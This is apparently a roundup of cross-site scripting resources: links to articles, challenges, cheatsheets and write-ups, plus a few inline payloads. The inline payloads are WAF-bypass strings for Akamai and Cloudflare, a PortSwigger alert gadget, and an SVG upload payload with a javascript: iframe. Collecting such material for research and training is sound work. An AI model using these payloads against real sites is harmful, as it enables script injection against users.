POST to XSS: Leveraging Pseudo Protocols to Gain JavaScript Evaluation in SSO Flows, very interesting article by Lauritz
bit.ly/4dEsSYA

A payload to bypass Akamai WAF, by jp seg
?foobar=<foo%20bar=%250a%20onclick=<your js code>
Works with any tag and any event handler

New Intigriti XSS challenge
challenge-0524.intigriti.io

A weird payload by PortSwigger Research
window&&=(window&&=opener||=alert)?.(1??0,)

mXSS cheatsheet, always useful... by Sonar Research
sonarsource.github.io/mxss-cheatshee…

Beyond XSS: Explore the Web Front-end Security Universe, a good site to start and improve with XSS. By huli
bit.ly/46ttM5S

How we escalated a DOM XSS to a sophisticated 1-click Account Takeover, a great article by Benasin and Long Phan Nguyên
Part 1: bit.ly/49N43qs
Part 2: bit.ly/3xXB2Ld

A cloudflare WAF bypass payload, reposted by Clandestine
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E

A nice collection of Server-Side Prototype Pollution gadgets by Mikhail Shcherbakov and the KTH Royal Institute of Technology
github.com/KTH-LangSec/se…

A confeti payload for nicer XSS, by renniepak
Demo: bit.ly/3vYQHJC
Code: 0-a.nl/conf.js

Bypasses for the most popular WAFs, a useful scheatsheet by Project NZT-48
bit.ly/3UiyoZv

Some more payloads, by VAIDIK PANDYA
x.com/h4x0r_fr34k/st…

Nice collection of XSS filters bypasses by Edra
github.com/Edr4/XSS-Bypas…

XSS WAF Bypass One payload for all, interesting evasion technique by Edra
bit.ly/3xvW5oc

April XSS challenge by Intigriti
challenge-0424.intigriti.io

Bypassing DOMPurify with good old XML, nice findings by RyotaK
bit.ly/4amINc3

2 interesting XSS writeups by sudi
github.com/Sudistark/xss-…

SVG File upload payload by Stealthy

<svg> <foreignObject width='100%' height='100%'> <body> <iframe src='javascript:confirm(10)'></iframe> </body> </foreignObject> </svg>

x.com/stealthybugs/s…

DOM Purify - untrusted Node bypass, a way to bypass DOMPurify when used in a specific way, by slonser
bit.ly/4aolQoo

March XSS challenge by Intigriti
challenge-0324.intigriti.io